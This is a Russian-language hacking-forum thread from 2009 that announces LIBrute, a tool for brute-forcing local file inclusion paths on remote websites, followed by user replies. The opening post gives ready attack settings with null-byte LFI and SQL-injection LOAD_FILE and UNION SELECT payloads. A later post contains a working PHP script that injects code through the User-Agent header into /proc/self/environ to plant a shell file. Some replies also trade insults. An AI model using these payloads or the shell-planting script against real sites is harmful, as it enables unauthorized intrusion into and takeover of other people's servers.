LIBrute

Discussion in 'Избранное' started by [х26]VОLАND, 9 Dec 2009.

  1. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    LIBrute

    [​IMG]

    Небольшая утилита представляет из себя средство автоматизации при проведении LFI.
    Функционал заключается в подборе файлов на удалённой машине по словарю путём подстановки локального url файла (например: ../../../../../../etc/httpd/conf/httpd.conf) в заданную HTTP-переменную.

    Словари можно взять от сюда:
    https://forum.antichat.ru/thread49775.html

    [ Возможности ]
    [+] Удобный GUI
    [+] Поддержка HTTPS
    [+] Поддержка прокси (HTTP/HTTPS)
    [+] Настройка авторедиректов
    [+] Возможность устрановки заголовка User-Agent
    [+] Возможность устрановки задержки между попытками
    [+] Возможность установки максимального скачиваемого размера страницы
    [+] 4 метода атаки:
    - Query String (для случаев с mod_rewrite)
    - Get
    - Post
    - Cookie (Get)
    [+] Возможность добавления в запрос дополнительных Post и Cookie переменных, которые будут автоматически добавляться в каждый запрос.
    [+] Для подстановки имени файла используется макрос {STR}
    [+] 2 варианта проверки на наличие файла:
    - по поиску заданной строки в странице
    - по изменению размера страницы
    [+] Режим атака сразу нескольких сайтов
    [+] Редактор настроек для атакуемых сайтов
    - возможность детальной настройки каждого сайта в отдельности
    - возможность загрузки списка атакуемых сайтов из файла
    - автоматический парсинг URL (в URL каждого сайта должен присутствовать макрос {STR}
    - целевая Get/Post/Cookie переменная передаются в программу одинаково - в виде обычной стоки запроса (http://site.com/?var={STR}%00), тип переменной указывается отдельно
    [+] Можно использовать сразу несколько словарей (например словарь локаций php.ini + httpd.conf, и т.д.)
    [+] Имеется возможность кодирования значения в Url или Hex (для атаки через SQL-инъекцию).

    Примечания:
    - Программа требует наличия .NET Framework >= 2.0

    Примеры использования

    1. Ищем файлы через LFI:
    http://site.com/index.php?page=news&lang=[файл]%00

    Настройки для брута будут такими:
    Code:
    [COLOR=LemonChiffon]Целевой URL:[/COLOR] [COLOR=White]http://site.com/index.php?page=news[/COLOR]
    [COLOR=LemonChiffon]Метод:[/COLOR] [COLOR=White]GET[/COLOR]
    [COLOR=LemonChiffon]Имя переменной:[/COLOR] [COLOR=White]lang[/COLOR]
    [COLOR=LemonChiffon]Значение переменной:[/COLOR] [COLOR=White]{STR}%00[/COLOR]
    [COLOR=LemonChiffon]Способ индикации:[/COLOR] [COLOR=White]по размеру страницы[/COLOR]
    2. Ищем файлы через SQL-инъекцию:
    http://site.com/index.php?id=-1+UNION+SELECT+1,LOAD_FILE([файл]),3--

    Настройки:
    Code:
    [COLOR=LemonChiffon]Целевой URL:[/COLOR] [COLOR=White]http://site.com/index.php[/COLOR]
    [COLOR=LemonChiffon]Метод:[/COLOR] [COLOR=White]GET[/COLOR]
    [COLOR=LemonChiffon]Имя переменной:[/COLOR] [COLOR=White]id[/COLOR]
    [COLOR=LemonChiffon]Значение переменной:[/COLOR] [COLOR=White]-1+UNION+SELECT+1,LOAD_FILE({STR}),3--[/COLOR]
    [COLOR=LemonChiffon]Кодирование:[/COLOR] [COLOR=White]Hex[/COLOR]
    [COLOR=LemonChiffon]Способ индикации:[/COLOR] [COLOR=White]по размеру страницы[/COLOR]
    3. Ищем имя таблицы:
    http://site.com/index.php?id=-1+UNION+SELECT+1,2,3+FROM+[таблица]--

    Настройки:
    Code:
    [COLOR=LemonChiffon]Целевой URL:[/COLOR] [COLOR=White]http://site.com/index.php[/COLOR]
    [COLOR=LemonChiffon]Метод:[/COLOR] [COLOR=White]GET[/COLOR]
    [COLOR=LemonChiffon]Имя переменной:[/COLOR] [COLOR=White]id[/COLOR]
    [COLOR=LemonChiffon]Значение переменной:[/COLOR] [COLOR=White]-1+UNION+SELECT+31337,2,3+FROM+{STR}--[/COLOR]
    [COLOR=LemonChiffon]Способ индикации:[/COLOR] [COLOR=White]Присутствие текста [I]31337[/I][/COLOR]
    Как видите, варианты использования ограничиваются только вашей фантазией.

    Просьба потестить в полевых условиях.

    [ Скачать ]
    LIBrute.zip
     
    #1 [х26]VОLАND, 9 Dec 2009
    Last edited: 19 Jan 2010
    26 people like this.
  2. SQLHACK

    SQLHACK Остались только слоны

    Joined:
    27 Sep 2006
    Messages:
    437
    Likes Received:
    372
    Reputations:
    407
    Без обид , Вариант №9. ))
     
    _________________________
  3. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,702
    Likes Received:
    1,223
    Reputations:
    455
    я такую писал чуть больше 2-х лет назад и выкладывал на ачает в паблике с названием lisearch
    Функционал предполагал
    - сразу проверять множество сайтов
    - поддержка HTTP прокси
    - таймауты на получение данных
    - максимальный размер данных которые скачивать (полезно когда инклудиш логи и они могут быть дофига метров)
    - поле - что искать
    - поле - чего не должно быть
    - задание кол-ва потоков
    - поддержка макроса [X] - куда будет вставлятсья текст
    - HEX кодирование (если шел подбор через SQL inj через LOAD_FILE)
    - HTTP кодирование

    Прожка была сыровата, кривовата, но функции свои выполняла, хаотя и была написана на Delphi )
    -----------
    Ели нашел свой пост с прожкой - http://forum.antichat.ru/nextnewesttothread45249.html
    ----------
    Но вообще более полезным была бы не прога, а скрипт перловый с web интерфесом потому что каналы серваков намного больше чем юзверьские. Да и юзать из любого места можно, достаточно ввести адрес, авторизоваться и можно работать )
     
    #3 slesh, 9 Dec 2009
    Last edited: 9 Dec 2009
  4. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,702
    Likes Received:
    1,223
    Reputations:
    455
    Зачем сразу удалять, будет как альтернатива для комплекта )
    Но вообще Perl версия нужнее или хотябы PHP
     
    1 person likes this.
  5. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    Добавил кодирование (надеюсь, slesh не обидится).
     
    1 person likes this.
  6. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    Если есть возможность, протестируйте на хосте с https.
     
  7. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    Вот очень бы хотел ман для "бестолковых" :))
    хотел бы поэкспереминтировать, только вот не знаю ключевые моменты, такие как
    Code:
    Имя переменной: lang
    Значение переменной: {STR}%00
    и другие параметры..
    если не сложно - напишите пожалуйста.. Обещаю проверить )))
     
  8. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    На GET запросе выглядить будет так:
    Имя переменной:
    inc.
    Значение переменной:
    article.
    В итоге запрос будет выглядить будет так:
    Это был GET.
    PHP:
    <?php
    include($_GET['inc'].'php'.); # Инклуд гетом
    ?>
    Про POST почти также, только там формы, пхп код:
    PHP:
    <?php
    include($_POST['inc'].'php'.); #Инклуд постом
    ?>
     
    1 person likes this.
  9. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    вот именно, что не знаю откуда брать самостоятельно эти значение..
     
  10. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    ТС, img Что это? Фреймворка 2.0 нет?
     
  11. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    перекачай.
     
  12. Matnya

    Matnya Banned

    Joined:
    2 Dec 2009
    Messages:
    22
    Likes Received:
    1
    Reputations:
    -15
    Собирался аналогичную писать.

    ЗЫ прогу потестил. не очень понравилось.
    слишком навящивый фуннкционал.
    нахуя там переменую вставлять?
    нахуя всякие счётчики трафика? в деревне живёшь?
    короче ТС делать было просто не xyй.

    надо было сделать поле, куда путь например до /etc/passwd копипаститься. а прога сама отпрасит, где корень, и где какая переменная.

    и нет автозаливателся шелла в /proc/self/environ , что очень важно.

    ещё бы можно было добавиь парсер темы с инклудами на ачате. что вообще прекрасно бы было. и ещё надо сделать список с инлудами, чтобы сканить сразу 10 инлудов и пить кофе в это время.

    короче написано на языке для блондинок (C#), блондином.

    будет время сам на C++ Builder напишу, а позже и на WinSock перепишу.
     
    #12 Matnya, 14 Dec 2009
    Last edited: 14 Dec 2009
  13. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    Мат неуместен =/, учитесь выражать мысли
    Такое и на php можно накодить.
    PS: Добавьте выбор задержки в мс :)
     
  14. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    Как ты собрался брутить если у тебя будет LFI в POST или Cookie?

    Для красоты.,,

    Привязка к конкретному сайту - не комильфо с точки зрения архитектуры.

    Планируется.

    :(

    И вообще, чего ты такой нервный?
    Расслабься, выпей чаю...
     
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    большего бреда в жизни не читал. Автоматизация залития шелла - это сильно (в случае брута путей). Нереально сильно. Вот сам лентяй, но чтобы "шелл ручками было западло залить" - не, ну это шедеврально. Кроме того, что просто глупо.
     
    #15 Pashkela, 14 Dec 2009
    Last edited: 14 Dec 2009
    2 people like this.
  16. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,702
    Likes Received:
    1,223
    Reputations:
    455
    2 Matnya
    По твоей логики, можно сказать что Delphi - для умственно отсталых.
    А если учесть что C++ Builder - это таже жопа, только с другова ракурса, то мне страшно подумать кто ты тогда.
    Ты жжош. вариант залива шела через него невелик. Темболее что есть куда других альтернатив. И ты предлагаешь их всех реализовывать в проге?
    Может ты хочешь вообще прогу с полем ввода сайта и кнопкой ХАК??


    И вообще в таких проектах не имеет значение на каком языке они написаны, потому что тут врядли будет такая уж большая скорость брута, чтобы заметить разницу в производительности языков
     
    1 person likes this.
  17. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    Автору плюсы за старание!
    С точки зрение кроссплатформенности имеет значение)
     
  18. Matnya

    Matnya Banned

    Joined:
    2 Dec 2009
    Messages:
    22
    Likes Received:
    1
    Reputations:
    -15
    Да ладно??!!

    Я имею автоматизацию залития в /proc/self/environ
    а не в др. логи. это вполне выполнимо легко. скрипт кодил 1 минуту на пыхе. там тупо код в юзер агент выставляеться. надо сделать так: если /proc/self/environ существует, то прога залвает шелл через него.

    PHP:
    <?php
    $host 
    "www.ыапывпывпывп.org";
    $port 80;
    $script "/index.php?page=../../../../../../../proc/self/environ";
    $sock fsockopen($host,$port);
    if(!
    $sock)
        echo 
    "Error";
    else
    {
    $head "POST $script HTTP/1.1\r\n";
    $head .= "Host: $host\r\n";
    $head .= 'User-Agent: <?php fwrite(fopen("shell.php","w+"),"<?php phpinfo(); ?>");?>\r\n';
    $head .= "Accept-Language: ru\r\n";
    $head .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $head .= "Content-Lenght: ".strlen("<?php phpinfo(); ?>")."\r\n";
    $head .= "\r\n<?php phpinfo(); ?>\r\n";
    fwrite($sock,$head);
    while(!
    feof($sock))
    {
    $respons .= fgets($sock,1024);
    }
    fclose($sock);
    }
    ?>
    ну ты мега-кодер просто не знаеш что такое /proc/self/environ. ты же встётаки масдайщег-кодер ;)
    если на сайте инлудиться это файлег, то 100% шелл.
    Бред. Ачат вроде как хек прожект. А те, кто кроме пыха и подстоновки кавычек нихуя больше не умеют, те не хеккеры. Кстати я бы в РОА не брал тех кто не умеют на сях кодить
     
    #18 Matnya, 14 Dec 2009
    Last edited: 14 Dec 2009
    1 person likes this.
  19. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    А кого волнует твоё мнение?))
     
    1 person likes this.
  20. Matnya

    Matnya Banned

    Joined:
    2 Dec 2009
    Messages:
    22
    Likes Received:
    1
    Reputations:
    -15
    свали в туман. не тебе был пост.